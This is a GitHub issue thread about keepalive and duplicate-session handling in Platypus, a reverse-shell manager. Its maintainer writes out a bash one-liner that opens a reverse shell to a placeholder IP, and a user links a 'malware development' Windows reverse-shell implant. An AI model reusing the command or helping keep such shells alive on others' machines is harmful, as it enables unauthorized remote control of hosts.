Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

KeepAlive option #7

Closed
ariadarkkkis opened this issue Feb 5, 2019 · 13 comments
Closed

KeepAlive option #7

ariadarkkkis opened this issue Feb 5, 2019 · 13 comments

Comments

@ariadarkkkis
Copy link

Hi, It would be great to add keepalive to connected session

@WangYihang
Copy link
Owner

WangYihang commented Feb 8, 2019

@ariadarkkkis
Sorry for the late reply.
By default, all connection will alive unless the client process is killed.
I am not sure what do you mean by keepalive, would you like to elaborate that?

@ariadarkkkis
Copy link
Author

ariadarkkkis commented Feb 8, 2019

Im using to code to get a reverse shell, But the problem is if you dont send anything to client for about 5 minutes I guess (im not sure bu definitely more than 2 Minutes), the client will disconnect and Because I edited the code and added a loop, so It will connect again. And after some time, the client list is like 100 connections from same IP address but none of them will connect until I connect to one of them and send something and then they will reconnect and after that I have to send something to the client again and then I get the shell running. Even after getting shell running and sending some commands, If you dont send something to client within that time I said, it will disconnect again. BTWW, I edited the code so it has 60 Seconds sleep (or timeout) to try to connect to my server again after it disconnected.

@ariadarkkkis
Copy link
Author

and BTW, I have 1 core 1GB ram VPS and when a lot of clients(which is not a lot, most of them are duplicate clients) after about some days, CPU usage on 1Core cpu will max to 100%. And I have to kill Platypus and re-run it again.

@ariadarkkkis
Copy link
Author

I guess it should have keep-alive option in it in case anyone needs. So sends some packets to client every like 60 Seconds so the client wont disconnect from my server. Im using Ubuntu 16.04 x64 LTS for running Platypus.

@WangYihang
Copy link
Owner

The predecessor of this tool actually has this function which is able to detect connections from the same IP and killing multiple connections from the same IP, but this function is removed due to possible NAT and port forwarding. You are right, I am thinking about whether I need to join to kill features from the same IP connection. maybe make it a server option.
You know due to the complexity of different operating systems and different shells, it is very difficult to detect whether it is from the same real host. Therefore, we have to use IP to uniquely identify a host. I don't know if this identifier is reasonable.

@WangYihang
Copy link
Owner

How do you create the reverse shell session, did you try to use bash commands like this?

bash -c 'bash >/dev/tcp/1.2.3.4/4444 0>&1 &'

@ariadarkkkis
Copy link
Author

@WangYihang sorry didnt paste the code, I use this code on Windows Machines:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

@ariadarkkkis
Copy link
Author

ariadarkkkis commented Feb 9, 2019

You can use hostname as an identifier or maybe add something like an identifier in a custom reverse shell like the one I gave you above. So the user can manually set the identifier or it gets the hostname and some other information like CPU and OS and something and make a hash out of them to make it unique.

@ariadarkkkis
Copy link
Author

@WangYihang It breaked my VPS, as I said before, after some days, the cpu load on 1core VPS will max out. I forgot to restart platypus and now my VPS has breaked.

@lnyzx lnyzx mentioned this issue Mar 12, 2019
@WangYihang
Copy link
Owner

@ariadarkkkis solved by @zxyxx,appreciate for his excellent work!

@ariadarkkkis
Copy link
Author

@zxyxx @WangYihang Can you make to replace new connection from same IP with old one? Like if a client with 1.2.3.4 IP connected 10 minutes ago and it sent another session now from same IP, Platypus replace new session with the old one and remove old one.

@ariadarkkkis
Copy link
Author

Because I still have this problem that I cant rejoin a session after about 10 minutes. Because session times out. Im using this as my reverse shell on Windows clients:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

I get this when I try to interact with a session from 30 minutes ago:

2019/03/18 05:37:20 Interacting with [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]
2019/03/18 05:37:20 Read from client failed
2019/03/18 05:37:20 Closing client: [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]

I used jump and then interact with that session. I dont know what the problem is and why the connection doesnt stay alive.

@WangYihang
Copy link
Owner

@ariadarkkkis Hey, bro, thank you so much for your reporting, could you please create a new issue to explain this feature request. ( one issue for a single problem ~ thank u~

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants